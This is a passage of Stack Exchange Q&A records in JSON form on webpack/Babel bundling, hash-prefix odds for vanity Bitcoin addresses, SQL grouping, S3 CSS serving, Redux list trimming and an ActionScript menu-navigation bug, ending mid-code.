http:\/\/webpack.github.io\/docs\/tutorials\/getting-started\/ .\nComment: oh i thought I could just run the babel output in the browser\nComment: so I just download webpack in npm and use that script?\nComment: I recommend to read the webpack documentation :) Also see https:\/\/babeljs.io\/docs\/using-babel\/#webpack in that case.\nComment: I just want to create a script that will bundle it for a cdn that someone will use. They wont have webpack.\nComment: I understand. Webpack bundles all modules and produces a single file.\nComment: I'm not sure this helps me https:\/\/github.com\/babel\/babel-loader + the docs are a bit confusing to my case\nAnswer: I read an article about how ES6 import and export are only supposed to work in browser with \"statically analyzable files\" and Babel removed import and export support in the browser because of this. Something to do with async or possibly security?\nIf you want to skip the server-side bundling for dev purposes, you can put \n<code>window.MyModule = MyModule<\/code> at the bottom, then import \n<code>var MyModule = window.MyModule<\/code> at the top of your next file\n","meta":{"source":"stackoverflow","title":"Babel generated code causes error exports is undefined","dup_signals":{}},"subset":"stackexchange"} +{"text":"Is it just as difficult to find a desired output in a hash digest, for MSB vs LSB?\n\nQuestion: This question comes to mind after seeing \"custom\" Bitcoin addresses with some special string at the beginning of the address. They are generated in the same way Bitcoins are \"mined\", continually hashing with a nonce + password to get some desired output. \nMy question is, is it just as hard to find <code>[HLOWRLD]M9VveeBLcY4UC4vjpPs6rZtFBQE<\/code> as it is to find <code>1FpUYCpM9V[HLOWRLD]4UC4vjpPs6rZtFBQE<\/code> as it is to find <code>1FpUYCpM9VveeBLcY4UC4vjpPs6[HLOWRLD]<\/code>? 
*Note the values in the digest not in brackets can be any value\nThe reverse to the question, given you have some insane computer, would it be easier to try to find the input for <code>[HLOWRLD]M9VveeBLcY4UC4vjpPs6rZtFBQE<\/code> versus <code>1FpUYCpM9V[HLOWRLD]4UC4vjpPs6rZtFBQE<\/code> versus <code>1FpUYCpM9VveeBLcY4UC4vjpPs6[HLOWRLD]<\/code>?\nAnswer: As the other answers point out, output bits of a good hash function are uniformly distributed, so your substring has equal chance to appear in any part of the hash digest.\nHowever, in the case of Bitcoin, the address is not a random string. Not only it starts with a predefined number (1 or 3), but the string is the result of the Base58-conversion, which may (I did not check) produce biased outputs. The addresses may even be of different lengths.\nComment: The first byte after the `1` is *extremely* biased. Character Characters `2` to `P` occur with about 4.3% probability, characters `R` to `z` with 0.07% probability. `1` and `Q` are somewhere in the middle. I believe this results from the rare characters being *impossible* if the address has the usual length, only occurring in the rare case where the number is small enough to have a shorter encoding. The bias quickly disappears as you get to less significant digits.\nAnswer: With an ideal hash function each bit of the output is 1 independently with 50% probability. So to find a hash with $n$ bits chosen you have a $2^{-n}$ chance per guess. That's regardless of which bits you chose, so whether they are in the beginning or the end doesn't matter. If you accept either, you can have about twice the chance, though, and more if you also accept it in the middle.\nA Bitcoin address is a hash of an elliptic curve public key, so searching for them is just like searching for hashes \u2013 you cycle through private keys in some way, generate corresponding public keys which you then hash. 
The actual process is rather complicated, but the address is a concatenation of two truncated hashes, which you can treat as another hash function.\nHowever, for Bitcoin it's slightly faster to search for a match in the beginning, because that saves you two SHA-256 computations which you would need to calculate the final 32 bits of the address.\n","meta":{"source":"crypto.stackexchange","title":"Is it just as difficult to find a desired output in a hash digest, for MSB vs LSB?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Need help on grouping this SQL table\n\nQuestion: I have this table\n\nI want to group it like\n<code>ProductID Purchased Sold\n------------------------------------\n1 235 0.00\n2 125 0.00\n3 55 24.00\n<\/code>\nHere Purchased = (IsCreditor <> 0)\nI tried this\n<code>SELECT\n ProductID, \n Max (TotalQty) As Purchased,\n Min(TotalQty) As Sold\nFROM\n TestTable\nGROUP BY\n ProductID\n<\/code>\nIt will work only if a product have both IsCreditor = 0 and IsCreditor = 1\nThe table is a small part of a stored Procedure\nIn this table, for productid = 1, if it is not purchased or sold, it won't appear and if it is purchased it appears with a qty and IsCreditor = 1 and if it is sold, it appears with qty in one row with IsCreditor=0 and one more with isCreditor=1 \nAnswer: add a CASE statement to separate purchased and sold items\n<code> SELECT\n ProductID, \n SUM(Case When IsCreditor = 1 then TotalQty else 0 end) AS [TotalPurchase],\n SUM(Case When IsCreditor = 0 then TotalQty else 0 end) AS [TotalSale]\n FROM\n TestTable\n GROUP BY\n ProductID\n<\/code>\n","meta":{"source":"stackoverflow","title":"Need help on grouping this SQL table","dup_signals":{}},"subset":"stackexchange"} +{"text":"AWS S3 Static Website isn't serving css files\n\nQuestion: I've gone through most of the previous related questions and answers that appear similar to mine. Here are some of the things I have tried based on what others have suggested:\n\nMade bucket public\nClear browser cache\nI've updated the key and value to match text\/css\n\nWhen I click the website endpoint link inside of S3, the CSS files upload to the browser properly.\nBut when I go directly to the web address from the browser, the page contains no CSS.\nThe style.css file is saved to my local cpu. Any suggestions are appreciated.\nAnswer: You need to upload CSS file to the S3 bucket and make it public. Although your bucket is public, objects inside the bucket are not. You need to explicitly make them public. Uploading and making your CSS file public in public S3 bucket will resolve the issue.\nComment: Thanks for your reply. I've checked this and it did not resolve the problem. The bucket as well as the objects inside are public. Do you have any other suggestions?\nComment: Assume html and css files are public and in the same public bucket. Here's my entry for style.css file in index.html file.. Both index.html and style.css are public and in same public S3 bucket\nComment: It was the code. Thanks. 
I've been stuck on this for 2 days.\n","meta":{"source":"stackoverflow","title":"AWS S3 Static Website isn't serving css files","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to add one item to the top of a redux store list while removing the bottom item from the list\n\nQuestion: I would like to remove only one item from a redux store list, once it has reached a certain number and return the new store with the new value added, but minus the first value on the list (array.shift).\nThink of a twitter stream that fills the store so every six tweets we are removing one from the bottom of the list and adding a new one to the top.\ncode:\n<code>\/\/ ------------------------------------\n\/\/ Action Handlers\n\/\/ ------------------------------------\nconst ACTION_HANDLERS = {\n [INIT_DATA]: (state, action) => {\n if (state.length < 5) {\n return [ ...state, action.payload.stream ]\n } else {\n return [ ...state.shift(), action.payload.stream ]\n }\n },\n [DISCONNECT]: (state, action) => ({ ...state, ...action.payload })\n}\n\/\/ ------------------------------------\n\/\/ Reducer\n\/\/ ------------------------------------\nconst initialState = []\n\nexport default function twitterStreamReducer (state = initialState, action) {\n const handler = ACTION_HANDLERS[action.type]\n\n return handler ? handler(state, action) : state\n}\n<\/code>\nThe above code returns a new store when lentgh > 5 and deletes all the old tweets not just the bottom one.\nAny ideas on the best way to do it without mutating the state?\nAnswer: You can use Array.slice which returns a shallow copy of your original array minus the sliced items. DO NOT use shift() which actually mutates your state and can cause all sorts of issues.\n<code>return [...state.slice(1), action.payload.stream]\n<\/code>\nAnswer: <code>Array#shift<\/code> returns the shifted value, not the array with the value removed (it shifts it in-place).\nYou can do\n<code>state.shift()\n[ ...state, action.payload.steam ] \n<\/code>\nalthough I'm pretty sure Redux docs specify that you should avoid acting on the state directly...\n","meta":{"source":"stackoverflow","title":"How to add one item to the top of a redux store list while removing the bottom item from the list","dup_signals":{}},"subset":"stackexchange"} +{"text":"Buttons Not Functioning as expected\n\nQuestion: I was wondering is someone can shed light on my code? It seems to work properly without any error, but certain buttons won't work. (i.e. 
Going to Investment Menu, then enter \"View Portfolio\", \"Investments\" and \" \"OK\" buttons won't work.)\nHere's the whole code.\n<code>import flash.events.MouseEvent;\nbg.stop();\/\/Buttons\nbg.ok.addEventListener(MouseEvent.CLICK, menu);\nfunction menu(m:MouseEvent):void\n{\n trace(m.target.name);\n trace(bg.currentFrame);\n if (bg.currentFrame == 1)\n {\n bg.ok.removeEventListener(MouseEvent.CLICK, menu);\n bg.gotoAndStop(2);\n bg.menubtn.addEventListener(MouseEvent.CLICK, menu);\n }\n else if (bg.currentFrame == 2 || bg.currentFrame == 4 && m.target.name == \"Menubtn4\" || bg.currentFrame == 5 && m.target.name == \"Menubtn5\" || bg.currentFrame == 6 && m.target.name == \"backtomain\" || bg.currentFrame == 7 && m.target.name == \"Menubtn7\" || bg.currentFrame == 9 && m.target.name == \"Menubtn9\" || bg.currentFrame == 13 && m.target.name == \"Menubtn13\" || bg.currentFrame == 20 && m.target.name == \"backtomenu20\" || bg.currentFrame == 24 && m.target.name == \"Menubtn24\" || bg.currentFrame == 27 && m.target.name == \"backtomenu27\" )\n {\n if (m.target.name == \"menubtn\")\n {\n bg.menubtn.removeEventListener(MouseEvent.CLICK, menu);\n }\n else if (m.target.name == \"Menubtn4\")\n {\n bg.Menubtn4.removeEventListener(MouseEvent.CLICK, menu);\n }\n else if (m.target.name == \"Menubtn5\")\n {\n bg.Menubtn5.removeEventListener(MouseEvent.CLICK, menu);\n }\n else if (m.target.name == \"backtomain\")\n {\n bg.backtomain.removeEventListener(MouseEvent.CLICK, menu);\n }\n else if (m.target.name == \"Menubtn7\")\n {\n bg.Menubtn7.removeEventListener(MouseEvent.CLICK, menu);\n }\n else if (m.target.name == \"Menubtn9\")\n {\n bg.Menubtn9.removeEventListener(MouseEvent.CLICK, menu);\n }\n else if (m.target.name == \"Menubtn13\")\n {\n bg.Menubtn13.removeEventListener(MouseEvent.CLICK, menu);\n }\n else if (m.target.name == \"backtomenu20\")\n {\n bg.backtomenu20.removeEventListener(MouseEvent.CLICK, menu);\n }\n else if (m.target.name == \"Menubtn24\")\n {\n bg.Menubtn24.removeEventListener(MouseEvent.CLICK, menu);\n }\n else if (m.target.name == \"backtomenu27\")\n {\n bg.backtomenu27.removeEventListener(MouseEvent.CLICK, menu);\n }\n bg.gotoAndStop(3);\n bg.Balinq.addEventListener(MouseEvent.CLICK, menu);\n bg.Transinq.addEventListener(MouseEvent.CLICK, menu);\n bg.Fintrxns.addEventListener(MouseEvent.CLICK, menu);\n bg.invest.addEventListener(MouseEvent.CLICK, menu);\n bg.others.addEventListener(MouseEvent.CLICK, menu);\n bg.passchange.addEventListener(MouseEvent.CLICK, menu);\n }\n else if (bg.currentFrame==3)\n {\n bg.Balinq.removeEventListener(MouseEvent.CLICK, menu);\n bg.Transinq.removeEventListener(MouseEvent.CLICK, menu);\n bg.Fintrxns.removeEventListener(MouseEvent.CLICK, menu);\n bg.invest.removeEventListener(MouseEvent.CLICK, menu);\n bg.others.removeEventListener(MouseEvent.CLICK, menu);\n bg.passchange.removeEventListener(MouseEvent.CLICK, menu);\n if (m.target.name == \"Balinq\")\n {\n bg.gotoAndStop(2);\n bg.menubtn.addEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"Transinq\")\n {\n bg.gotoAndStop(4);\n bg.Menubtn4.addEventListener(MouseEvent.CLICK, menu);\n bg.okbtn4.addEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"Fintrxns\")\n {\n bg.gotoAndStop(6);\n bg.backtomain.addEventListener(MouseEvent.CLICK, menu);\n bg.transown.addEventListener(MouseEvent.CLICK, menu);\n bg.transthird.addEventListener(MouseEvent.CLICK, menu);\n bg.transanyone.addEventListener(MouseEvent.CLICK, menu);\n bg.billsdeposit.addEventListener(MouseEvent.CLICK, 
menu);\n bg.billscredit.addEventListener(MouseEvent.CLICK, menu);\n bg.reloadphone.addEventListener(MouseEvent.CLICK, menu);\n bg.reloadwallet.addEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"others\")\n {\n bg.gotoAndStop(20);\n bg.backtomenu20.addEventListener(MouseEvent.CLICK, menu);\n bg.checkbook.addEventListener(MouseEvent.CLICK, menu);\n bg.stoppay.addEventListener(MouseEvent.CLICK, menu);\n bg.enrollacct.addEventListener(MouseEvent.CLICK, menu);\n bg.enrollthird.addEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"passchange\")\n {\n bg.gotoAndStop(24);\n bg.Menubtn24.addEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"invest\")\n {\n bg.gotoAndStop(27);\n bg.backtomenu27.addEventListener(MouseEvent.CLICK, menu);\n bg.viewport.addEventListener(MouseEvent.CLICK, menu);\n bg.viewhist.addEventListener(MouseEvent.CLICK, menu);\n bg.subscribe.addEventListener(MouseEvent.CLICK, menu);\n bg.redeem.addEventListener(MouseEvent.CLICK, menu);\n }\n }\n else if (bg.currentFrame==4)\n {\n bg.Menubtn4.removeEventListener(MouseEvent.CLICK, menu);\n bg.okbtn4.removeEventListener(MouseEvent.CLICK, menu);\n bg.gotoAndStop(5);\n bg.Menubtn5.addEventListener(MouseEvent.CLICK, menu);\n }\n else if (bg.currentFrame==6)\n {\n bg.backtomain.removeEventListener(MouseEvent.CLICK, menu);\n bg.transown.removeEventListener(MouseEvent.CLICK, menu);\n bg.transthird.removeEventListener(MouseEvent.CLICK, menu);\n bg.transanyone.removeEventListener(MouseEvent.CLICK, menu);\n bg.reloadphone.removeEventListener(MouseEvent.CLICK, menu);\n if (m.target.name == \"transown\")\n {\n bg.gotoAndStop(7);\n bg.Menubtn7.addEventListener(MouseEvent.CLICK, menu);\n bg.okbtn7.addEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"transthird\")\n {\n bg.gotoAndStop(9);\n bg.Menubtn9.addEventListener(MouseEvent.CLICK, menu);\n bg.okbtn9.addEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"transanyone\")\n {\n bg.gotoAndStop(13);\n bg.Menubtn13.addEventListener(MouseEvent.CLICK, menu);\n bg.okbtn13.addEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"billsdeposit\")\n {\n bg.gotoAndStop(15);\n bg.finbtn15.addEventListener(MouseEvent.CLICK, menu);\n bg.okbtn15.addEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"billscredit\")\n {\n bg.gotoAndStop(28);\n bg.finbtn28.addEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"reloadphone\")\n {\n bg.gotoAndStop(17);\n bg.finbtn17.addEventListener(MouseEvent.CLICK, menu);\n bg.okbtn17.addEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"reloadwallet\")\n {\n bg.gotoAndStop(18);\n bg.finbtn18.addEventListener(MouseEvent.CLICK, menu);\n }\n }\n else if (bg.currentFrame==7)\n {\n bg.Menubtn7.removeEventListener(MouseEvent.CLICK, menu);\n bg.okbtn7.removeEventListener(MouseEvent.CLICK, menu);\n if (m.target.name == \"okbtn7\")\n {\n bg.gotoAndStop(8);\n bg.finbtn8.addEventListener(MouseEvent.CLICK, menu);\n }\n } ;\/*current frame 8*\/\n }\n else if (m.target.name==\"finbtn8\" || m.target.name==\"finbtn10\" || m.target.name==\"finbtn11\" || m.target.name==\"finbtn12\" || m.target.name==\"finbtn14\" || m.target.name==\"finbtn15\" || m.target.name==\"finbtn16\" || m.target.name==\"finbtn17\" || m.target.name==\"finbtn18\" ||m.target.name==\"finbtn26\" ||m.target.name==\"finbtn28\")\n {\n if (m.target.name == \"finbtn8\")\n {\n bg.finbtn8.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"finbtn10\")\n {\n 
bg.finbtn10.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"finbtn11\")\n {\n bg.finbtn11.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"finbtn12\")\n {\n bg.finbtn12.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"finbtn14\")\n {\n bg.finbtn14.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"finbtn15\")\n {\n bg.finbtn15.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"finbtn16\")\n {\n bg.finbtn16.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"finbtn17\")\n {\n bg.finbtn17.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"finbtn18\")\n {\n bg.finbtn18.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"finbtn26\")\n {\n bg.finbtn26.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"finbtn28\")\n {\n bg.finbtn28.removeEventListener(MouseEvent.CLICK, menu);\n }\n bg.gotoAndStop(6);\n bg.backtomain.addEventListener(MouseEvent.CLICK, menu);\n bg.transown.addEventListener(MouseEvent.CLICK, menu);\n bg.transthird.addEventListener(MouseEvent.CLICK, menu);\n bg.transanyone.addEventListener(MouseEvent.CLICK, menu);\n bg.billsdeposit.addEventListener(MouseEvent.CLICK, menu);\n bg.billscredit.addEventListener(MouseEvent.CLICK, menu);\n bg.reloadphone.addEventListener(MouseEvent.CLICK, menu);\n bg.reloadwallet.addEventListener(MouseEvent.CLICK, menu);\n }\n else if (bg.currentFrame==9 || m.target.name==\"backbtn11\")\n {\n if (bg.currentFrame == 9)\n {\n bg.Menubtn9.removeEventListener(MouseEvent.CLICK, menu);\n bg.okbtn9.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"backbtn11\")\n {\n bg.finbtn11.removeEventListener(MouseEvent.CLICK, menu);\n bg.okbtn11.removeEventListener(MouseEvent.CLICK, menu);\n bg.backbtn11.removeEventListener(MouseEvent.CLICK, menu);\n }\n bg.gotoAndStop(10);\n bg.finbtn10.addEventListener(MouseEvent.CLICK, menu);\n bg.okbtn10.addEventListener(MouseEvent.CLICK, menu);\n }\n else if (bg.currentFrame==10)\n {\n bg.finbtn10.removeEventListener(MouseEvent.CLICK, menu);\n bg.okbtn10.removeEventListener(MouseEvent.CLICK, menu);\n bg.gotoAndStop(11);\n bg.finbtn11.addEventListener(MouseEvent.CLICK, menu);\n bg.okbtn11.addEventListener(MouseEvent.CLICK, menu);\n bg.backbtn11.addEventListener(MouseEvent.CLICK, menu);\n }\n else if (bg.currentFrame==11)\n {\n bg.finbtn11.removeEventListener(MouseEvent.CLICK, menu);\n bg.okbtn11.removeEventListener(MouseEvent.CLICK, menu);\n bg.backbtn11.removeEventListener(MouseEvent.CLICK, menu);\n bg.gotoAndStop(12);\n bg.finbtn12.addEventListener(MouseEvent.CLICK, menu);\n }\n else if (bg.currentFrame==13)\n {\n bg.Menubtn13.removeEventListener(MouseEvent.CLICK, menu);\n bg.okbtn13.removeEventListener(MouseEvent.CLICK, menu);\n bg.gotoAndStop(14);\n bg.finbtn14.addEventListener(MouseEvent.CLICK, menu);\n }\n else if (bg.currentFrame==15)\n {\n bg.finbtn15.removeEventListener(MouseEvent.CLICK, menu);\n bg.okbtn15.removeEventListener(MouseEvent.CLICK, menu);\n bg.gotoAndStop(16);\n bg.finbtn16.addEventListener(MouseEvent.CLICK, menu);\n bg.backbtn16.addEventListener(MouseEvent.CLICK, menu);\n }\n else if (bg.currentFrame==16)\n {\n bg.gotoAndStop(15);\n bg.finbtn15.addEventListener(MouseEvent.CLICK, menu);\n }\n else if (bg.currentFrame==17)\n {\n bg.finbtn17.removeEventListener(MouseEvent.CLICK, menu);\n bg.okbtn17.removeEventListener(MouseEvent.CLICK, menu);\n bg.gotoAndStop(26);\n 
bg.finbtn26.addEventListener(MouseEvent.CLICK, menu);\n }\n else if (bg.currentFrame==20)\n {\n bg.backtomenu20.removeEventListener(MouseEvent.CLICK, menu);\n bg.checkbook.removeEventListener(MouseEvent.CLICK, menu);\n bg.stoppay.removeEventListener(MouseEvent.CLICK, menu);\n bg.enrollacct.removeEventListener(MouseEvent.CLICK, menu);\n bg.enrollthird.removeEventListener(MouseEvent.CLICK, menu);\n if (m.target.name == \"checkbook\")\n {\n bg.gotoAndStop(21);\n bg.otherbtn21.addEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"stoppay\")\n {\n bg.gotoAndStop(22);\n bg.otherbtn22.addEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"enrollacct\")\n {\n bg.gotoAndStop(23);\n bg.otherbtn23.addEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"enrollthird\")\n {\n bg.gotoAndStop(25);\n bg.otherbtn25.addEventListener(MouseEvent.CLICK, menu);\n }\n }\n else if (m.target.name==\"otherbtn21\" || m.target.name==\"otherbtn22\" || m.target.name==\"otherbtn23\" || m.target.name==\"otherbtn25\")\n {\n if (m.target.name == \"otherbtn21\")\n {\n bg.otherbtn21.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"otherbtn22\")\n {\n bg.otherbtn22.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"otherbtn23\")\n {\n bg.otherbtn23.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"otherbtn25\")\n {\n bg.otherbtn25.removeEventListener(MouseEvent.CLICK, menu);\n }\n bg.gotoAndStop(20);\n bg.backtomenu20.addEventListener(MouseEvent.CLICK, menu);\n bg.checkbook.addEventListener(MouseEvent.CLICK, menu);\n bg.stoppay.addEventListener(MouseEvent.CLICK, menu);\n bg.enrollacct.addEventListener(MouseEvent.CLICK, menu);\n bg.enrollthird.addEventListener(MouseEvent.CLICK, menu);\n }\n else if (bg.currentFrame==27)\n {\n bg.backtomenu27.removeEventListener(MouseEvent.CLICK, menu);\n bg.viewport.removeEventListener(MouseEvent.CLICK, menu);\n bg.viewhist.removeEventListener(MouseEvent.CLICK, menu);\n bg.subscribe.removeEventListener(MouseEvent.CLICK, menu);\n bg.redeem.removeEventListener(MouseEvent.CLICK, menu);\n if (m.target.name == \"viewport\")\n {\n bg.gotoAndStop(29);\n bg.backtoinvest29.addEventListener(MouseEvent.CLICK, menu);\n bg.okinvest1.addEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"viewhist\")\n {\n bg.gotoAndStop(32);\n bg.backtoinvest32.addEventListener(MouseEvent.CLICK, menu);\n bg.donebtn32.addEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"subscribe\")\n {\n bg.gotoAndStop(35);\n bg.backtoinvest35.addEventListener(MouseEvent.CLICK, menu);\n bg.donebtn35.addEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"redeem\")\n {\n bg.gotoAndStop(42);\n bg.backtoinvest42.addEventListener(MouseEvent.CLICK, menu);\n bg.okinvest4.addEventListener(MouseEvent.CLICK, menu);\n }\n else if (bg.currentFrame==29)\n {\n bg.backtoinvest29.removeEventListener(MouseEvent.CLICK, menu);\n bg.okinvest1.removeEventListener(MouseEvent.CLICK, menu);\n if (m.target.name == \"okinvest1\")\n {\n bg.gotoAndStop(30);\n bg.backtoinvest30.addEventListener(MouseEvent.CLICK, menu);\n }\n else if (bg.currentFrame ==30)\n {\n bg.backtoinvest30.removeEventListener(MouseEvent.CLICK, menu);\n bg.donebtn30.addEventListener(MouseEvent.CLICK, menu);\n if (m.target.name == \"donebtn30\")\n {\n bg.gotoAndStop(31);\n bg.backtoinvest31.addEventListener(MouseEvent.CLICK, menu);\n }\n }\n else if (m.target.name==\"backtoinvest29\" || m.target.name==\"backtoinvest30\" || 
m.target.name==\"backtoinvest31\" || m.target.name==\"backtoinvest32\" || m.target.name==\"backtoinvest33\" || m.target.name==\"backtoinvest34\" || m.target.name==\"backtoinvest35\" || m.target.name==\"backtoinvest36\" || m.target.name==\"backtoinvest37\" || m.target.name==\"backtoinvest38\" ||m.target.name==\"backtoinvest39\" || m.target.name==\"backtoinvest41\" || m.target.name==\"backtoinvest42\" || m.target.name==\"backtoinvest43\" || m.target.name==\"backtoinvest44\" || m.target.name==\"backtoinvest45\" || m.target.name==\"backtoinvest46\" || m.target.name==\"backtoinvest47\" || m.target.name==\"backtoinvest48\")\n {\n if (m.target.name == \"backtoinvest29\")\n {\n bg.backtoinvest29.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"backtoinvest30\")\n {\n bg.backtoinvest30.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"backtoinvest31\")\n {\n bg.backtoinvest31.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"backtoinvest32\")\n {\n bg.backtoinvest32.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"backtoinvest33\")\n {\n bg.backtoinvest33.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"backtoinvest34\")\n {\n bg.backtoinvest34.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"backtoinvest35\")\n {\n bg.backtoinvest35.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"backtoinvest36\")\n {\n bg.backtoinvest36.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"backtoinvest37\")\n {\n bg.backtoinvest37.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"backtoinvest38\")\n {\n bg.backtoinvest38.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"backtoinvest39\")\n {\n bg.backtoinvest39.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"backtoinvest41\")\n {\n bg.backtoinvest41.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"backtoinvest42\")\n {\n bg.backtoinvest42.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"backtoinvest43\")\n {\n bg.backtoinvest43.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"backtoinvest44\")\n {\n bg.backtoinvest44.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"backtoinvest45\")\n {\n bg.backtoinvest45.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"backtoinvest46\")\n {\n bg.backtoinvest46.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"backtoinvest46\")\n {\n bg.backtoinvest46.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"backtoinvest47\")\n {\n bg.backtoinvest47.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"backtoinvest48\")\n {\n bg.backtoinvest48.removeEventListener(MouseEvent.CLICK, menu);\n }\n bg.gotoAndStop(27);\n bg.backtomenu27.addEventListener(MouseEvent.CLICK, menu);\n bg.viewport.addEventListener(MouseEvent.CLICK, menu);\n bg.viewhist.addEventListener(MouseEvent.CLICK, menu);\n bg.subscribe.addEventListener(MouseEvent.CLICK, menu);\n bg.redeem.addEventListener(MouseEvent.CLICK, menu);\n }\n else if (bg.currentFrame==32)\n {\n if (bg.currentFrame == 32)\n {\n bg.backtoinvest32.removeEventListener(MouseEvent.CLICK, menu);\n bg.donebtn32.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"donebtn32\")\n {\n bg.gotoAndStop(33);\n 
bg.backtoinvest33.addEventListener(MouseEvent.CLICK, menu);\n bg.okinvest2.addEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"okinvest2\")\n {\n bg.gotoAndStop(34);\n bg.backtoinvest33.removeEventListener(MouseEvent.CLICK, menu);\n bg.okinvest2.removeEventListener(MouseEvent.CLICK, menu);\n bg.backtoinvest34.addEventListener(MouseEvent.CLICK, menu);\n }\n }\n else if (bg.currentFrame==35)\n {\n bg.backtoinvest35.removeEventListener(MouseEvent.CLICK, menu);\n bg.donebtn35.removeEventListener(MouseEvent.CLICK, menu);\n if (m.target.name == \"donebtn35\")\n {\n bg.gotoAndStop(36);\n bg.backtoinvest36.addEventListener(MouseEvent.CLICK, menu);\n bg.okinvest3.addEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"okinvest3\")\n {\n bg.gotoAndStop(37);\n bg.backtoinvest37.addEventListener(MouseEvent.CLICK, menu);\n bg.donebtn37.addEventListener(MouseEvent.CLICK, menu);\n }\n else if (bg.currentFrame==37)\n {\n bg.backtoinvest36.removeEventListener(MouseEvent.CLICK, menu);\n bg.okinvest3.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"donebtn37\")\n {\n bg.gotoAndStop(38);\n bg.backtoinvest38.addEventListener(MouseEvent.CLICK, menu);\n bg.okbtn38.addEventListener(MouseEvent.CLICK, menu);\n }\n else if (bg.currentFrame==38)\n {\n bg.backtoinvest37.removeEventListener(MouseEvent.CLICK, menu);\n bg.donebtn37.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"okbtn38\")\n {\n bg.gotoAndStop(39);\n bg.backtoinvest39.addEventListener(MouseEvent.CLICK, menu);\n bg.okbtn39.addEventListener(MouseEvent.CLICK, menu);\n }\n else if (bg.currentFrame==39)\n {\n bg.backtoinvest38.removeEventListener(MouseEvent.CLICK, menu);\n bg.okbtn38.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"okbtn39\")\n {\n bg.gotoAndStop(40);\n bg.backtoinvest39.removeEventListener(MouseEvent.CLICK, menu);\n bg.okbtn39.removeEventListener(MouseEvent.CLICK, menu);\n bg.backtoinvest39.removeEventListener(MouseEvent.CLICK, menu);\n bg.okbtn40.addEventListener(MouseEvent.CLICK, menu);\n }\n else if (bg.currentFrame==40)\n {\n bg.okbtn40.removeEventListener(MouseEvent.CLICK, menu);\n bg.backtoinvest40.addEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"okbtn40\")\n {\n bg.gotoAndStop(41);\n bg.backtoinvest41.addEventListener(MouseEvent.CLICK, menu);\n }\n }\n else if (bg.currentFrame==42)\n {\n bg.backtoinvest42.removeEventListener(MouseEvent.CLICK, menu);\n bg.okinvest4.removeEventListener(MouseEvent.CLICK, menu);\n if (m.target.name == \"okinvest4\")\n {\n bg.gotoAndStop(42);\n bg.backtoinvest43.addEventListener(MouseEvent.CLICK, menu);\n bg.donebtn43.addEventListener(MouseEvent.CLICK, menu);\n }\n else if (bg.currentFrame==43)\n {\n bg.backtoinvest43.removeEventListener(MouseEvent.CLICK, menu);\n bg.donebtn43.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"donebtn43\")\n {\n bg.gotoAndStop(44);\n bg.backtoinvest44.addEventListener(MouseEvent.CLICK, menu);\n bg.donebtn44.addEventListener(MouseEvent.CLICK, menu);\n }\n else 